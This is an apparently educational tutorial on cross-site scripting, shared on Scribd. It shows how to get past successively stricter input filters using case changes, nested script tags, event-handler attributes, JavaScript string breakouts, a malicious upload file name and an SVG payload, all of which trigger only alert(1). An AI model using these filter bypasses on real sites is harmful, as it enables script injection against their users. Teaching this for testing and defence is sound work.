Scribd
Upload
10 views8 pages

Cross Site Scripting

Uploaded by

monibhushan.03
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
10 views8 pages

Cross Site Scripting

Uploaded by

monibhushan.03
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

🎓

Cross Site Scripting


Example- 01:
The first example is getting an alert box using a basic payload.
We can just use <script> alert(1) </script> to get a popup.

Example- 02:
Now the developer noticed the vulnerability. He fixed that vulnerability using some
Regular Expression. If you just try the previous payload and look at the ‘page
source’, you will notice that the <script> tag is escaped in the source code. In this
scenario many of us thinks that there no XSS is possible. But it’s possible. If we try
to modify our payload-
the xss will be executed. We can try to change any of the
<scRipt> alert(1) </scrIpt>

letter to uppercase. Even we can try - <SCRIPT> alert(1) <SCRIPT>

If we put <script>alert(1)</script> and view the ‘page source’ that will looks
something like this:

Cross Site Scripting 1


<div class="row">
<div class="col-lg-12">
<h1>XSS 02</h1>
<p>Welcome
noob mehedi;alert(1)!</p>
</div>
</div>

But if we put - <Script>alert(1)</scRipt> this will pop up our alert

<div class="row">
<div class="col-lg-12">
<h1>XSS 02</h1>
<p>Welcome
noob mehedi;<Script>alert(1)</scRipt>!</p>
</div>
</div>

Example- 03:
This time developer noticed about our previous bypass. So he add some more
filtering. If we try our previous payload that will be escaped also. So we need to
find an alternative.

The developer this time implement a code where all the <script> tag will be
escaped. No matter how you try the <script> tag. So what we can do?

If we try ( test<script>test ) what will happen?

We will see in the ‘page source’ that <script> is escaped and testtest is exist in the
source code. This gives a good indication about our bypass. Now what if we try
<scrscriptipt> ?

Cross Site Scripting 2


script will definitely escaped but after escaping script we are getting another
<script> (<scr….ipt> became <script> ) . This will execute our xss. So our payload is-

<scrscriptipt> alert(1) </scrscriptipt> which will be turned into - <script>alert(1)


</script>

When we are giving only - <script>alert(1)</script> the <script> tag will be


escaped.

<div class="row">
<div class="col-lg-12">
<h1>XSS 03</h1>
<p>Welcome
noob mehedi; alert(1)!</p>

</div>
</div>

But if we input <scrscriptipt>alert(1)</scrscriptipt>

<div class="row">
<div class="col-lg-12">
<h1>XSS 03</h1>
<p>Welcome
noob mehedi; <script>alert(1)</script>!</p>

</div>
</div>

Example- 04:

Cross Site Scripting 3


This time the developer filtered whenever there is a <script> tag it should be
escaped. But there’s some other way to execute JavaScript.

We can use the following payload to execute JavaScript-


We can use onmouseover, onmouseout, onmousemove, onclick also. It’s good to
use them withn <a> tag. Because when you use them with <a> tag like this way –
<a onmouseover = 'alert(1)' > Test </a>

The text ‘Test’ will be shown in the browser as a link because we used <a> tag –

Now when we put your mouse on Test , a popup you will get. So the benefit of
using <a> tag is we can pretty sure where we should put or move our mouse to
execute our payload.

Some others payload which we can use with <a> tag-

<a onmouseout = 'alert(1)' > Test </a> will execute when we move our mouse from
Test to out.
<a onmousemove = 'alert(1)' > Test </a> will execute when we move our mouse on
Test.
<a onclick = 'alert(1)' > Test </a> will execute when we click on Test.

You can also use javascript:alert(1) both with <a> tag and <img> tag.

Another common payload which is used to bypass filter is-


<img src='mehedi' onerror='alert(1)' /> execute when it get an error in img src. Here
the image source is invalid. So it get an error and execute onerror.

Cross Site Scripting 4


We can also use onmouseover, onmouseout, onmousemove, onclick with <div>
tag. But you need to write your payload based on the source code. (Read part 1).
This is not for <div> tag only. You need to notice the source code from page
source every time you write a payload.

More Readings
Example- 05:
The developer this time just tried to prevent <script> tag. So the developer this
time implemented the code in such a way therefore whatever the user gives input,
it echoed back in the <script> tag.

Didn't get it? Ok , just remember the <script> tag is already given in the page
source. Like this way-

<script>
// User input goes here whatever he gives input
</script>

suppose the user entered <script>alert(1)</script> . This will show in the page
source in this way-

<script>
<script>alert(1)</script>
</script>

If its go into a variable this will go into a variable. Suppose our variable is $x-

<script>
var $x = "<script>alert(1)</script>";
</script>

Cross Site Scripting 5


So this will not execute. We need to use our payload without <script> tag.
Because <script> is already there. We need to modify our payload according to
the page source. If it's not in a variable we can simply put alert(1) to get a popup.

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"
</script>
</p>
</div>
</div>

After input a double quote (”) -

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"";
</script>
</p>
</div>
</div>

Now we need to properly handle this. If we enter a ; this will look like this-

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!

Cross Site Scripting 6


<script>
var $a= "noob mehedi";";
</script>
</p>
</div>
</div>

Now if we input another variable to balance this- "; var $b="

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"; var $b="";
</script>
</p>
</div>
</div>

Now we can get our pop up by using alert between var $a and var $b

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"; alert(1); var $b="";
</script>
</p>
</div>
</div>

Cross Site Scripting 7


XSS via file upload:
Rename your file with your payload. You can use burpsuite. First upload your file
in the website. In burpsuite , capture the request and rename the file with your
payload. Then forward the request. An example of the file name given below-
"><img src=x onerror=alert(1)>.png

XSS via svg:


Sometimes, the source code echo the metadata. In this case we can try xss via
svg. Again upload a svg image file and capture the request in burpsuite. we will
see the metadata of our file in the request body. Replace the metadata with your
xml payload. A payload example is given below -

<?xml version="1.0" standalone="no"?>


<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w
3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.or
g/2000/svg">
<script type="text/javascript">
alert(1);
</script>
</svg>

Cross Site Scripting 8

You might also like